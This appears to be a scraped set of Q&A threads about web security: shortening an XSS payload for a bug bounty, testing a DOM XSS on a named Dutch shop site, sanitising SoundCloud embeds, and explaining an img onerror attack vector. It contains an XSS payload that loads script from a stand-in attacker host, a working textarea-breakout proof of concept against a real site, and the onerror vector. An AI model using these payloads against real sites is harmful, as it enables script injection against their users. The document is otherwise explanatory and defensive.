What is the shortest code to load js dynamically - xss

I found a xss vulnerability on a website and want to exploit it for bug bounty. the problem: maximal 100 Characters and i want to load external javscript. There is no jquery on the website.
This is the shortest xss to load external javascript i found but its 114 characters. Is it possbile to get a shorter code? yes i know the url could be shorter but thats the only thing. i tried everything.
<img src onerror="var d=document,s=d.createElement`script`;s.src='//attacker.com',d.querySelector`p`.appendChild(s)">

Related

Regex to replace spam links in Wordpress

I am dealing with old hacked sites in Wordpress where there are injection spam links on images.
I have access to the database and would like to remove links that look like this:
<a style="text-decoration:none" href="/ansaid-retail-cost">.</a>
Now text varies inside the <href> it might be for cialas or any product, but the rest doesn't vary. I want to remove the entire LINK, so the result is a single space.
I don't know regex, so I would appreciate the help. I've tried online generators but they don't seem to be working.

XSS DOM vulnerable

I tested site for vulnerables (folder /service-contact) and possible XSS DOM issue came up (using Kali Linux, Vega and XSSER). However, i tried to manually test url with 'alert' script to make sure it's vulnerable. I used
www.babyland.nl/service-contact/alert("test")
No alert box/pop-up was shown, only the html code showed up in contact form box.
I am not sure i used the right code (i'm a rookie) or did the right interpretation. Server is Apache, using javascript/js.
Can you help?
Thanks!
This is Not Vulnerable to XSS, Whatever you are writing in the URL is Coming in Below Form section ( Vraag/opmerking ) . And the Double Quotes (") are Escaped. If you try another Payload like <script>alert(/xss/)</script> That Also won't work, Because this is Not Reflecting neither Storing. You will see output as a Text in Vraag/opmerking. Don't Rely on Online Scanners, Test Manually, For DOM Based XSS ..Check Sink and Sources and Analyze them.
The tool is right. There is a XSS-Vulnerability on the site, but the proof of concept (PoC) code is wrong. The content of a <textarea> can only contain character data (see <textarea> description on MDN). So your <script>alert("test")</script> is interpreted as text and not as HTML code. But you can close the <textarea> tag and insert the javascript code after that.
Here is the working PoC URL:
https://www.babyland.nl/service-contact/</textarea><script>alert("test")</script>
which is rendered as:
<textarea rows="" cols="" id="comment" name="comment"></textarea<script>alert("test")</script></textarea>
A little note to testing for XSS injection: Chrome/Chromium has a XSS protection. So this code doesn't exploit in this browser. For manual testing you can use Firefox or run Chrome with: --disable-web-security (see this StackOverflow Question and this for more information).

How to ensure users only embed SoundCloud iFrame?

I am building a social networking website for musicians and I would like them to be able to enter the embed code provided by SoundCloud, so that they may have a sound clip on their posts.
However, I am unsure how I would sanitise the input, to ensure that it's only a SoundCloud iframe embed code that they enter. I want to avoid them pasting in embed code for say, YouTube or anything else for that matter.
An example embed code from SoundCloud looks like:
<iframe width="100%" height="166" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F85146642"></iframe>
I am using the HTML parser, jSoup to sanitise input.
The key fragment to this is the src content:
https://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F85146642
One possibility I thought of, was to extract the src parameters value and then rebuild the iframe myself, this way, only storing the URL and ensuring that any HTML output to the browser is that which I have created myself. Doing this may also allow me to run checks on the domain name etc.
I'm wondering what the best approach would be for this?
Appreciate any input you may have.
Thanks,
Michael.
PS - I am using Railo (ColdFusion server) and the Java jSoup library, but I guess the same principles would apply regardless of what language one would use.

Will youtube address with only code usually work?

In setting up a part of a site where users can enter url for youtube video and have it play in modal window -- currently using fancybox -- have found that some urls don't work, even with fancybox regex for the href.
However, it appears that just getting the video's code and appending it to a basic url stem works. Such as:
http://www.youtube.com/watch?v={video code}
as in http://www.youtube.com/watch?v=OMYzsAurxHY
I run the submitted url through a series of ColdFusion regexs to get the code, and then append to the "http://www.youtube.com/watch?v=" stem.
Note having any problems, but just want to see if anyone more familiar with youtube sees any problem with assuming this stem + video code wouldn't always work -- or at least a great percentage of the time.
Thanks

Need explanation on specific XSS attack vector

So my school website has been hacked cos my professor got XSS-ed. So I found that attacker used this XSS attack vector
<img src="<img src=search"/onerror=alert("Xss")//">
Can anyone explain me how this vector works , and how do you suggest I setup my site against further XSS attacks. Why img inside img tag?
Thanks..
Simply, he is ending your src tag and then inserting his own onerror handler. The onerror gets called when the image cannot be loaded. You can prevent this from escaping all user input - expect that every user is trying to hack your site.
In PHP, you could do this by using:
strip_tags($_POST['val']):